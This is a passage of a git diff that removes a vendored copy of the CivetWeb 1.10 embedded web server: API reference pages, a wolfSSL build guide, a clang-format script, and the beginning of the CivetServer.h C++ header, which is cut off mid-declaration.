-|**`put_delete_auth_file`**| *empty* | The option `put_delete_auth_file` defines the password file to be used for PUT and DELETE requests. Without a password file it is not possible to put new files to the server, or to delete existing ones. This only applies to direct HTTP requests which use the PUT and DELETE methods without server side scripting. PUT and DELETE requests might still be handled by Lua scripts and CGI pages. |
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`struct mg_context *`| A pointer to a context structure when successful, or NULL in case of failure |
-
-### Description
-
-The function `mg_start()` is the only function needed to call to initialize the webserver. After the function returns and a pointer to a context structure is provided, it is guaranteed that the server has started and is listening on the designated ports. In case of failure a NULL pointer is returned.  The behaviour of the web server is controlled by a list of callback functions and a list of options.  The callback functions can do application specific processing of events which are encountered by the webserver. If a specific callback function is set to NULL, the webserver uses their default callback routine. The options list controls how the webserver should be started and contains settings for for example the ports to listen on, the maximum number of threads created to handle requests in parallel and if settings for SSL encryption.
-
-As a side effect on Unix systems, SIGCHLD and SIGPIPE signals will be ignored. If custom processing is needed for these signals, signal handlers must be setup after the call to `mg_start()` has completed.
-
-### See Also
-
-* [`struct mg_callbacks;`](mg_callbacks.md)
-* [`mg_stop();`](mg_stop.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_start_thread.md b/thirdparty/civetweb-1.10/docs/api/mg_start_thread.md
deleted file mode 100644
index e817226..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_start_thread.md
+++ /dev/null
@@ -1,26 +0,0 @@
-# Civetweb API Reference
-
-### `mg_start_thread( func, cbdata );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`func`**|`mg_thread_func_t`|Function to start as a separate thread|
-|**`cbdata`**|`void *`|User defined data to be passed to the thread as parameter|
-
-`void mg_thread_func_t( void *cbdata );`
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`int`|Success or error code|
-
-### Description
-
-The function `mg_start_thread()` is a convenience function to create a detached thread. The function returns **0** when successful and another value if an error occured. A pointer to user supplied data can be passed which is then passed further on to the thread function as parameter.
-
-### See Also
-
-* [`mg_start();`](mg_start.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_stop.md b/thirdparty/civetweb-1.10/docs/api/mg_stop.md
deleted file mode 100644
index ea0d246..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_stop.md
+++ /dev/null
@@ -1,22 +0,0 @@
-# Civetweb API Reference
-
-### `mg_stop( ctx );`
-
-#### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`ctx`**|**`struct mg_context *`**| A pointer to the current webserver context |
-
-### Return Value
-
-*none*
-
-### Description
-
-The function `mg_stop()` is used to stop and cleanup a running webserver. A pointer to the context of the running webserver is provided as a parameter. The execution of this function may take some time because it waits until all threads have stopped and returns all memory to the heap. After the function returns, the location the context pointer points to is invalid. The function does not return a return value and it is therefore not possible to know if stopping the webserver succeeded or not.
-
-### See Also
-
-* [`mg_start();`](mg_start.md)
-* [`mg_start_thread();`](mg_start_thread.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_store_body.md b/thirdparty/civetweb-1.10/docs/api/mg_store_body.md
deleted file mode 100644
index 4cde44a..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_store_body.md
+++ /dev/null
@@ -1,24 +0,0 @@
-# Civetweb API Reference
-
-### `mg_store_body( conn, path );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`conn`**|`struct mg_connection *`|connection on which to read the data|
-|**`path`**|`const char *`|file to store the request body|
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`long long`|Number of bytes written to the file, or an error code|
-
-### Description
-
-The function `mg_store_body()` stores the body of an incoming request to a data file. The function returns the number of bytes stored in the file, or a negative value to indicate an error.
-
-### See Also
-
-* [`mg_read();`](mg_read.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_strcasecmp.md b/thirdparty/civetweb-1.10/docs/api/mg_strcasecmp.md
deleted file mode 100644
index cba6b92..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_strcasecmp.md
+++ /dev/null
@@ -1,24 +0,0 @@
-# Civetweb API Reference
-
-### `mg_strcasecmp( s1, s2 );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`s1`**|`const char *`|First string to compare|
-|**`s2`**|`const char *`|Second string to compare|
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`int`|Integer value with the result of the comparison|
-
-### Description
-
-The function `mg_strcasecmp()` is a helper function to compare two strings. The comparison is case insensitive. The return value is **0** if both strings are equal, less then zero if the first string is less than the second in a lexical comparison, and greater than zero if the first string is greater than the second.
-
-### See Also
-
-* [`mg_strncasecmp();`](mg_strncasecmp.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_strncasecmp.md b/thirdparty/civetweb-1.10/docs/api/mg_strncasecmp.md
deleted file mode 100644
index b4affd6..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_strncasecmp.md
+++ /dev/null
@@ -1,25 +0,0 @@
-# Civetweb API Reference
-
-### `mg_strncasecmp( s1, s2, len );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`s1`**|`const char *`|First string in the comparison|
-|**`s2`**|`const char *`|Second string in the comparison|
-|**`len`**|`size_t`|The maximum number of characters to compare|
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`int`|The result of the comparison|
-
-### Description
-
-The function `mg_strncasecmp()` is a helper function to compare two strings. The comparison is case insensitive and only a limited number of characters are compared. This limit is provided as third parameter in the function call. The return value is **0** if both strings are equal, less then zero if the first string is less than the second in a lexical comparison, and greater than zero if the first string is greater than the second.
-
-### See Also
-
-* [`mg_strcasecmp();`](mg_strcasecmp.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_unlock_connection.md b/thirdparty/civetweb-1.10/docs/api/mg_unlock_connection.md
deleted file mode 100644
index b74138f..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_unlock_connection.md
+++ /dev/null
@@ -1,27 +0,0 @@
-# Civetweb API Reference
-
-### `mg_unlock_connection( conn );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`conn`**|`struct mg_connection *`|Connection to remove the lock from|
-
-### Return Value
-
-*none*
-
-### Description
-
-The function `mg_unlock_connection()` removes the lock on a connection which was previously set with a call to [`mg_lock_connection()`](mg_lock_connection.md). Locking may be necessary when using [`mg_write()`](mg_write.md) or [`mg_printf()`](mg_printf.md) on websocket connections to prevent data corruption.
-
-### See Also
-
-* [`mg_lock_connection();`](mg_lock_connection.md)
-* [`mg_lock_context();`](mg_lock_context.md)
-* [`mg_printf();`](mg_printf.md)
-* [`mg_unlock_context();`](mg_unlock_context.md)
-* [`mg_websocket_client_write();`](mg_websocket_client_write.md)
-* [`mg_websocket_write();`](mg_websocket_write.md)
-* [`mg_write();`](mg_write.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_unlock_context.md b/thirdparty/civetweb-1.10/docs/api/mg_unlock_context.md
deleted file mode 100644
index a630acd..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_unlock_context.md
+++ /dev/null
@@ -1,23 +0,0 @@
-# Civetweb API Reference
-
-### `mg_unlock_context( ctx );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`ctx`**|`struct mg_context *`|The context to remove the lock from|
-
-### Return Value
-
-*none*
-
-### Description
-
-The function `mg_unlock_contect()` removes a lock put previously on a context with a call to [`mg_lock_context()`](mg_lock_context.md). Locking a context may be necessary when accessing shared resources.
-
-### See Also
-
-* [`mg_lock_connection();`](mg_lock_connection.md)
-* [`mg_lock_context();`](mg_lock_context.md)
-* [`mg_unlock_connection();`](mg_unlock_connection.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_upload.md b/thirdparty/civetweb-1.10/docs/api/mg_upload.md
deleted file mode 100644
index de7f1c8..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_upload.md
+++ /dev/null
@@ -1,22 +0,0 @@
-# Civetweb API Reference
-
-### ~~`mg_upload( conn, destination_dir );`~~
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`conn`**|`struct mg_connection *`|Connection on which files to upload|
-|**`destination_dir`**|`const char *`|The destination directory to upload to|
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`int`|Success or error code|
-
-### Description
-
-The function `mg_upload()` is deprecated and may be removed from future releases. Use of this function is therefore highly discouraged.
-
-### See Also
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_url_decode.md b/thirdparty/civetweb-1.10/docs/api/mg_url_decode.md
deleted file mode 100644
index 6794088..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_url_decode.md
+++ /dev/null
@@ -1,27 +0,0 @@
-# Civetweb API Reference
-
-### `mg_url_decode( src, src_len, dst, dst_len, is_form_url_encoded );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`src`**|`const char *`|Source data to convert|
-|**`src_len`**|`int`|Length of the source buffer|
-|**`dst`**|`char *`|Destination buffer to store the result|
-|**`dst_len`**|`int`|Length of the destination buffer|
-|**`is_form_url_encoded`**|`int`|Not equal zero when form decoding must be used|
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`int`|The number of bytes stored in the destination buffer, or **-1** if the buffer doesn't exist or is too small|
-
-### Description
-
-The function `mg_url_decode()` Decodes a in input buffer. Both normal URIs and form URIs can be decoded. In the latter case the space character is converted to a `+` as defined in [RFC 1866](http://ftp.ics.uci.edu/pub/ietf/html/rfc1866.txt) in section 8.2.1.
-
-### See Also
-
-* [`mg_url_encode();`](mg_url_encode.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_url_encode.md b/thirdparty/civetweb-1.10/docs/api/mg_url_encode.md
deleted file mode 100644
index 465af12..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_url_encode.md
+++ /dev/null
@@ -1,25 +0,0 @@
-# Civetweb API Reference
-
-### `mg_url_encode( src, dst, des_len );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`src`**|`const char *`|Input string to encode|
-|**`dst`**|`char *`|Destination buffer to store the encoded result|
-|**`dst_len`**|`size_t`|Length of the destination buffer including the terminating NUL|
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`int`|The number of characters written in the destination buffer|
-
-### Description
-
-The function `mg_url_encode()` encodes a in input buffer. Both normal URIs and form URIs can be encoded. In the latter case the space character is converted to a `+` as defined in [RFC 1866](http://ftp.ics.uci.edu/pub/ietf/html/rfc1866.txt) in section 8.2.1.
-
-### See Also
-
-* [`mg_url_decode();`](mg_url_decode.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_version.md b/thirdparty/civetweb-1.10/docs/api/mg_version.md
deleted file mode 100644
index a31128b..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_version.md
+++ /dev/null
@@ -1,19 +0,0 @@
-# Civetweb API Reference
-
-### `mg_version();`
-
-### Parameters
-
-*none*
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`const char *`| A pointer to a text with the current CivetWeb version |
-
-### Description
-
-The function `mg_version()` can be used to return the current CivetWeb version.  The function returns a pointer to a string with the current major and minor version number separated with a dot, for example "1.9".
-
-### See Also
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_websocket_client_write.md b/thirdparty/civetweb-1.10/docs/api/mg_websocket_client_write.md
deleted file mode 100644
index f792f4c..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_websocket_client_write.md
+++ /dev/null
@@ -1,32 +0,0 @@
-# Civetweb API Reference
-
-### `mg_websocket_client_write( conn, opcode, data, data_len );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`conn`**|`struct mg_connection *`|Connection on which to send data|
-|**`opcode`**|`int`|Opcode|
-|**`data const`**|`char *`|The data to be written|
-|**`data_len`**|`size_t`|Length of the data buffer|
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`int`|Number of bytes written or an error code|
-
-### Description
-
-The function `mg_websocket_client_write()` sends data to a websocket server wrapped in a masked websocket frame. The function issues calls to [`mg_lock_connection()`](mg_lock_connection.md) and [`mg_unlock_connection()`](mg_unlock_connection.md) to ensure that the transmission is not interrupted. Interruption can happen the the application is proactively communicating and responding to a request simultaneously. This function is available only, if Civetweb is compiled with the option `-DUSE_WEBSOCKET`.
-
-The return value is the number of bytes written on success, **0** when the connection has been closed and **-1** if an error occured.
-
-### See Also
-
-* [`mg_lock_connection();`](mg_lock_connection.md)
-* [`mg_printf();`](mg_printf.md)
-* [`mg_unlock_connection();`](mg_unlock_connection.md)
-* [`mg_websocket_write();`](mg_websocket_write.md)
-* [`mg_write();`](mg_write.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_websocket_write.md b/thirdparty/civetweb-1.10/docs/api/mg_websocket_write.md
deleted file mode 100644
index 3c7eadc..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_websocket_write.md
+++ /dev/null
@@ -1,34 +0,0 @@
-# Civetweb API Reference
-
-### `mg_websocket_write( conn, opcode, data, data_len );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`conn`**|`struct mg_connection *`|Connection on which the data must be written|
-|**`opcode`**|`int`|Opcode|
-|**`data`**|`const char *`|Data to be written to the client|
-|**`data_len`**|`size_t`|Length of the data|
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`int`|Number of bytes written or an error code|
-
-### Description
-
-The function `mg_websocket_write()` sends data to a websocket client wrapped in a websocket frame. The function issues calls to [`mg_lock_connection()`](mg_lock_connection.md) and [`mg_unlock_connection()`](mg_unlock_connection.md) to ensure that the transmission is not interrupted. Data corruption can otherwise happen if the application is proactively communicating and responding to a request simultaneously.
-
-The function is available only when Civetweb is compiled with the `-DUSE_WEBSOCKET` option.
-
-The function returns the number of bytes written, **0** when the connection has been closed and **-1** if an error occurred.
-
-### See Also
-
-* [`mg_lock_connection();`](mg_lock_connection.md)
-* [`mg_printf();`](mg_printf.md)
-* [`mg_unlock_connection();`](mg_unlock_connection.md)
-* [`mg_websocket_client_write();`](mg_websocket_client_write.md)
-* [`mg_write();`](mg_write.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_write.md b/thirdparty/civetweb-1.10/docs/api/mg_write.md
deleted file mode 100644
index d501857..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_write.md
+++ /dev/null
@@ -1,29 +0,0 @@
-# Civetweb API Reference
-
-### `mg_write( conn, buf, len );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`conn`**|`struct mg_connection *`| A pointer to the connection to be used to send data |
-|**`buf`**|`const void *`| A pointer to the blob of information to be sent |
-|**`len`**|`size_t`| The amount of bytes to be sent |
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`int`| An integer indicating the amount of bytes sent, or failure |
-
-### Description
-
-The function `mg_write()` can be used to send a blob of arbitrary data over a connection. The size of the data is provided as a parameter. The only length limitation on this function is `MAX_INT`, because the return value of this function will turn negative with larger blocks of data, although they may have been sent correctly. The function returns the amount of bytes sent in case of success, the value **0** when the connection has been closed, and **-1** in case of an error.
-
-### See Also
-
-* [`mg_lock_connection();`](mg_lock_connection.md)
-* [`mg_printf();`](mg_print.md)
-* [`mg_unlock_connection();`](mg_unlock_connection.md)
-* [`mg_websocket_client_write();`](mg_websocket_client_write.md)
-* [`mg_websocket_write();`](mg_websocket_write.md)
diff --git a/thirdparty/civetweb-1.10/docs/yaSSL.md b/thirdparty/civetweb-1.10/docs/yaSSL.md
deleted file mode 100644
index 7f2e85f..0000000
--- a/thirdparty/civetweb-1.10/docs/yaSSL.md
+++ /dev/null
@@ -1,87 +0,0 @@
-Adding wolfSSL (formerly CyaSSL) support
-=====
-
-In order to support SSL *HTTPS* connections in Civetweb,
-you may wish to use the GPLv2 licensed CyaSSL library.  By using this
-library, the resulting binary may have to have the GPL license unless
-you buy a commercial license from [wolfSSL](http://www.yassl.com/).
-
-*Note: The following instructions have not been checked for the most recent versions of CivetWeb and wolfSSL. Some information might be outdated.*
-
-
-Getting Started
-----
-
-- Download Cayssl at https://www.wolfssl.com (formerly http://www.yassl.com/)
-- Extract the zip file
-    - To make this seemless, extract to a directory parallel to with Civetweb is
-
-### Example Project
-
-If you download cyaSSL to cyassl-2.7.0 in a directory parallel to Civetweb, you can open the *VS/civetweb_yassl* solution in Visual Studio.
-
-Build Configuration
-----
-
-#### Required include paths for both civetweb and cyassl
- - *cyassl_directory*\
- - *cyassl_directory*\cyassl\
-
-#### Required civetweb preprocessor defines
- - USE_YASSL
- - NO_SSL_DL
-
-#### Required cySSL preprocessor defines
- - OPENSSL_EXTRA
- - HAVE_ERRNO_H
- - HAVE_GETHOSTBYNAME
- - HAVE_INET_NTOA
- - HAVE_LIMITS_H
- - HAVE_MEMSET
- - HAVE_SOCKET
- - HAVE_STDDEF_H
- - HAVE_STDLIB_H
- - HAVE_STRING_H
- - HAVE_SYS_STAT_H
- - HAVE_SYS_TYPES_H
-
-#### Required CyaSSL source files
-
- - ctaocrypt/src/aes.c
- - ctaocrypt/src/arc4.c
- - ctaocrypt/src/asn.c
- - ctaocrypt/src/coding.c
- - ctaocrypt/src/des3.c
- - ctaocrypt/src/dh.c
- - ctaocrypt/src/dsa.c
- - ctaocrypt/src/ecc.c
- - ctaocrypt/src/error.c
- - ctaocrypt/src/hc128.c
- - ctaocrypt/src/hmac.c
- - ctaocrypt/src/integer.c
- - ctaocrypt/src/logging.c
- - ctaocrypt/src/md2.c
- - ctaocrypt/src/md4.c
- - ctaocrypt/src/md5.c
- - ctaocrypt/src/memory.c
- - ctaocrypt/src/misc.c
- - ctaocrypt/src/pwdbased.c
- - ctaocrypt/src/rabbit.c
- - ctaocrypt/src/random.c
- - ctaocrypt/src/ripemd.c
- - ctaocrypt/src/rsa.c
- - ctaocrypt/src/sha.c
- - ctaocrypt/src/sha256.c
- - ctaocrypt/src/sha512.c
- - ctaocrypt/src/tfm.c
- - src/crl.c
- - src/internal.c
- - src/io.c
- - src/keys.c
- - src/ocsp.c
- - src/sniffer.c
- - src/ssl.c
- - src/tls.c
-
-
-
diff --git a/thirdparty/civetweb-1.10/format.bat b/thirdparty/civetweb-1.10/format.bat
deleted file mode 100755
index e1ce640..0000000
--- a/thirdparty/civetweb-1.10/format.bat
+++ /dev/null
@@ -1,33 +0,0 @@
-#!/bin/sh
-clang-format -i src/civetweb.c
-clang-format -i src/main.c
-clang-format -i src/CivetServer.cpp
-clang-format -i src/civetweb_private_lua.h
-clang-format -i src/md5.inl
-clang-format -i src/sha1.inl
-clang-format -i src/mod_lua.inl
-clang-format -i src/mod_duktape.inl
-clang-format -i src/timer.inl
-clang-format -i src/handle_form.inl
-
-clang-format -i src/third_party/civetweb_lua.h
-
-clang-format -i include/civetweb.h
-clang-format -i include/CivetServer.h
-
-clang-format -i test/public_func.h
-clang-format -i test/public_func.c
-clang-format -i test/public_server.h
-clang-format -i test/public_server.c
-clang-format -i test/private.h
-clang-format -i test/private.c
-clang-format -i test/private_exe.h
-clang-format -i test/private_exe.c
-clang-format -i test/shared.h
-clang-format -i test/shared.c
-clang-format -i test/timertest.h
-clang-format -i test/timertest.c
-clang-format -i test/civetweb_check.h
-clang-format -i test/main.c
-
-clang-format -i examples/embedded_c/embedded_c.c
diff --git a/thirdparty/civetweb-1.10/include/CivetServer.h b/thirdparty/civetweb-1.10/include/CivetServer.h
deleted file mode 100644
index 2da1096..0000000
--- a/thirdparty/civetweb-1.10/include/CivetServer.h
+++ /dev/null
@@ -1,611 +0,0 @@
-/* Copyright (c) 2013-2017 the Civetweb developers
- * Copyright (c) 2013 No Face Press, LLC
- *
- * License http://opensource.org/licenses/mit-license.php MIT License
- */
-
-#ifndef _CIVETWEB_SERVER_H_
-#define _CIVETWEB_SERVER_H_
-#ifdef __cplusplus
-
-#include "civetweb.h"
-#include <map>
-#include <string>
-#include <vector>
-#include <stdexcept>
-
-// forward declaration
-class CivetServer;
-
-/**
- * Exception class for thrown exceptions within the CivetHandler object.
- */
-class CIVETWEB_API CivetException : public std::runtime_error
-{
-  public:
-	CivetException(const std::string &msg) : std::runtime_error(msg)
-	{
-	}
-};
-
-/**
- * Basic interface for a URI request handler.  Handlers implementations
- * must be reentrant.
- */
-class CIVETWEB_API CivetHandler
-{
-  public:
-	/**
-	 * Destructor
-	 */
-	virtual ~CivetHandler()
-	{
-	}
-
-	/**
-	 * Callback method for GET request.
-	 *
-	 * @param server - the calling server
-	 * @param conn - the connection information
-	 * @returns true if implemented, false otherwise
-	 */
-	virtual bool handleGet(CivetServer *server, struct mg_connection *conn);
-
-	/**
-	 * Callback method for POST request.
-	 *
-	 * @param server - the calling server
-	 * @param conn - the connection information
-	 * @returns true if implemented, false otherwise
-	 */
-	virtual bool handlePost(CivetServer *server, struct mg_connection *conn);
-
-	/**
-	 * Callback method for HEAD request.
-	 *
-	 * @param server - the calling server
-	 * @param conn - the connection information
-	 * @returns true if implemented, false otherwise
-	 */
-	virtual bool handleHead(CivetServer *server, struct mg_connection *conn);
-
-	/**
-	 * Callback method for PUT request.
-	 *
-	 * @param server - the calling server
-	 * @param conn - the connection information
-	 * @returns true if implemented, false otherwise
-	 */
-	virtual bool handlePut(CivetServer *server, struct mg_connection *conn);
-
-	/**
-	 * Callback method for DELETE request.
-	 *
-	 * @param server - the calling server
-	 * @param conn - the connection information
-	 * @returns true if implemented, false otherwise
-	 */
-	virtual bool handleDelete(CivetServer *server, struct mg_connection *conn);
-
-	/**
-	 * Callback method for OPTIONS request.
-	 *
-	 * @param server - the calling server
-	 * @param conn - the connection information
-	 * @returns true if implemented, false otherwise
-	 */
-	virtual bool handleOptions(CivetServer *server, struct mg_connection *conn);
-
-	/**
-	 * Callback method for PATCH request.
-	 *
-	 * @param server - the calling server
-	 * @param conn - the connection information
-	 * @returns true if implemented, false otherwise
-	 */
-	virtual bool handlePatch(CivetServer *server, struct mg_connection *conn);
-};
-
-/**
- * Basic interface for a URI authorization handler.  Handler implementations
- * must be reentrant.
- */
-class CIVETWEB_API CivetAuthHandler
-{
-  public:
-	/**
-	 * Destructor
-	 */
-	virtual ~CivetAuthHandler()
-	{
-	}
-
-	/**
-	 * Callback method for authorization requests. It is up the this handler
-	 * to generate 401 responses if authorization fails.
-	 *
-	 * @param server - the calling server
-	 * @param conn - the connection information
-	 * @returns true if authorization succeeded, false otherwise
-	 */
-	virtual bool authorize(CivetServer *server, struct mg_connection *conn) = 0;
-};
-
-/**
- * Basic interface for a websocket handler.  Handlers implementations
- * must be reentrant.
- */
-class CIVETWEB_API CivetWebSocketHandler
-{
-  public:
-	/**
-	 * Destructor
-	 */
-	virtual ~CivetWebSocketHandler()
-	{
-	}
-
-	/**
-	 * Callback method for when the client intends to establish a websocket
-	 *connection, before websocket handshake.
-	 *
-	 * @param server - the calling server
-	 * @param conn - the connection information
-	 * @returns true to keep socket open, false to close it
-	 */
-	virtual bool handleConnection(CivetServer *server,
-	                              const struct mg_connection *conn);
-
-	/**
-	 * Callback method for when websocket handshake is successfully completed,
-	 *and connection is ready for data exchange.
-	 *
-	 * @param server - the calling server
-	 * @param conn - the connection information
-	 */
-	virtual void handleReadyState(CivetServer *server,
-	                              struct mg_connection *conn);
-
-	/**
-	 * Callback method for when a data frame has been received from the client.
-	 *
-	 * @param server - the calling server
-	 * @param conn - the connection information
-	 * @bits: first byte of the websocket frame, see websocket RFC at
-	 *http://tools.ietf.org/html/rfc6455, section 5.2
-	 * @data, data_len: payload, with mask (if any) already applied.
-	 * @returns true to keep socket open, false to close it
-	 */
-	virtual bool handleData(CivetServer *server,
-	                        struct mg_connection *conn,
-	                        int bits,
-	                        char *data,
-	                        size_t data_len);
-
-	/**
-	 * Callback method for when the connection is closed.
-	 *
-	 * @param server - the calling server
-	 * @param conn - the connection information
-	 */
-	virtual void handleClose(CivetServer *server,
-	                         const struct mg_connection *conn);
-};
-
-/**
- * CivetCallbacks
- *
- * wrapper for mg_callbacks
- */
-struct CIVETWEB_API CivetCallbacks : public mg_callbacks {
-	CivetCallbacks();
-};
-
-/**
- * CivetServer
- *
- * Basic class for embedded web server.  This has an URL mapping built-in.
- */
-class CIVETWEB_API CivetServer
-{
-  public:
-	/**
-	 * Constructor
-	 *
-	 * This automatically starts the sever.
-	 * It is good practice to call getContext() after this in case there
-	 * were errors starting the server.
-	 *
-	 * Note: CivetServer should not be used as a static instance in a Windows
-	 * DLL, since the constructor creates threads and the destructor joins
-	 * them again (creating/joining threads should not be done in static
-	 * constructors).
-	 *
-	 * @param options - the web server options.
-	 * @param callbacks - optional web server callback methods.
-	 *
-	 * @throws CivetException
-	 */
-	CivetServer(const char **options,
-	            const struct CivetCallbacks *callbacks = 0,
-	            const void *UserContext = 0);
-	CivetServer(std::vector<std::string> options,
-	            const struct CivetCallbacks *callbacks = 0,
-	            const void *UserContext = 0);
-
-	/**
-	 * Destructor
-	 */
-	virtual ~CivetServer();
-
-	/**
-	 * close()
-	 *
-	 * Stops server and frees resources.
-	 */
-	void close();
-
-	/**
-	 * getContext()
-	 *
-	 * @return the context or 0 if not running.
-	 */
-	const struct mg_context *
-	getContext() const
-	{
-		return context;
-	}
-
-	/**
-	 * addHandler(const std::string &, CivetHandler *)
-	 *
-	 * Adds a URI handler.  If there is existing URI handler, it will
-	 * be replaced with this one.
-	 *
-	 * URI's are ordered and prefix (REST) URI's are supported.
-	 *
-	 *  @param uri - URI to match.
-	 *  @param handler - handler instance to use.
-	 */
-	void addHandler(const std::string &uri, CivetHandler *handler);
-
-	void
-	addHandler(const std::string &uri, CivetHandler &handler)
-	{
-		addHandler(uri, &handler);
-	}
-
-	/**
-	 * addWebSocketHandler
-	 *
-	 * Adds a WebSocket handler for a specific URI.  If there is existing URI
-	 *handler, it will
-	 * be replaced with this one.
-	 *
-	 * URI's are ordered and prefix (REST) URI's are supported.
-	 *
-	 *  @param uri - URI to match.
-	 *  @param handler - handler instance to use.
-	 */
-	void addWebSocketHandler(const std::string &uri,
-	                         CivetWebSocketHandler *handler);
-
-	void
-	addWebSocketHandler(const std::string &uri, CivetWebSocketHandler &handler)
-	{
-		addWebSocketHandler(uri, &handler);
-	}
-
-	/**
-	 * removeHandler(const std::string &)
-	 *
-	 * Removes a handler.
-	 *
-	 * @param uri - the exact URL used in addHandler().
-	 */
-	void removeHandler(const std::string &uri);
-
-	/**
-	 * removeWebSocketHandler(const std::string &)
-	 *
-	 * Removes a web socket handler.
-	 *
-	 * @param uri - the exact URL used in addWebSocketHandler().
-	 */
-	void removeWebSocketHandler(const std::string &uri);
-
-	/**
-	 * addAuthHandler(const std::string &, CivetAuthHandler *)
-	 *
-	 * Adds a URI authorization handler.  If there is existing URI authorization
-	 * handler, it will be replaced with this one.
-	 *
-	 * URI's are ordered and prefix (REST) URI's are supported.
-	 *
-	 * @param uri - URI to match.
-	 * @param handler - authorization handler instance to use.
-	 */
-	void addAuthHandler(const std::string &uri, CivetAuthHandler *handler);
-
-	void
-	addAuthHandler(const std::string &uri, CivetAuthHandler &handler)
-	{
-		addAuthHandler(uri, &handler);
-	}
-
-	/**
-	 * removeAuthHandler(const std::string &)
-	 *
-	 * Removes an authorization handler.
-	 *
-	 * @param uri - the exact URL used in addAuthHandler().
-	 */
-	void removeAuthHandler(const std::string &uri);
-
-	/**
-	 * getListeningPorts()
-	 *
-	 * Returns a list of ports that are listening
-	 *
-	 * @return A vector of ports
-	 */
-
-	std::vector<int> getListeningPorts();
-
-	/**
-	 * getCookie(struct mg_connection *conn, const std::string &cookieName,
-	 *std::string &cookieValue)
-	 *
-	 * Puts the cookie value string that matches the cookie name in the
-	 *cookieValue destinaton string.
-	 *
-	 * @param conn - the connection information
-	 * @param cookieName - cookie name to get the value from
-	 * @param cookieValue - cookie value is returned using thiis reference
-	 * @returns the size of the cookie value string read.
-	*/
-	static int getCookie(struct mg_connection *conn,
-	                     const std::string &cookieName,
-	                     std::string &cookieValue);
-
-	/**
-	 * getHeader(struct mg_connection *conn, const std::string &headerName)
-	 * @param conn - the connection information
-	 * @param headerName - header name to get the value from
-	 * @returns a char array whcih contains the header value as string
-	*/
-	static const char *getHeader(struct mg_connection *conn,
-	                             const std::string &headerName);
-
-	/**
-	 * getParam(struct mg_connection *conn, const char *, std::string &, size_t)
-	 *
-	 * Returns a query paramter contained in the supplied buffer.  The
-	 * occurance value is a zero-based index of a particular key name.  This
-	 * should not be confused with the index over all of the keys.  Note that
-	 *this
-	 * function assumes that parameters are sent as text in http query string
-	 * format, which is the default for web forms. This function will work for
-	 * html forms with method="GET" and method="POST" attributes. In other
-	 *cases,
-	 * you may use a getParam version that directly takes the data instead of
-	 *the
-	 * connection as a first argument.
-	 *
-	 * @param conn - parameters are read from the data sent through this
-	 *connection
-	 * @param name - the key to search for
-	 * @param dst - the destination string
-	 * @param occurrence - the occurrence of the selected name in the query (0
-	 *based).
-	 * @return true if key was found
-	 */
-	static bool getParam(struct mg_connection *conn,
-	                     const char *name,
-	                     std::string &dst,
-	                     size_t occurrence = 0);
-
-	/**
-	 * getParam(const std::string &, const char *, std::string &, size_t)
-	 *
-	 * Returns a query paramter contained in the supplied buffer.  The
-	 * occurance value is a zero-based index of a particular key name.  This
-	 * should not be confused with the index over all of the keys.
-	 *
-	 * @param data - the query string (text)
-	 * @param name - the key to search for
-	 * @param dst - the destination string
-	 * @param occurrence - the occurrence of the selected name in the query (0
-	 *based).
-	 * @return true if key was found
-	 */
-	static bool
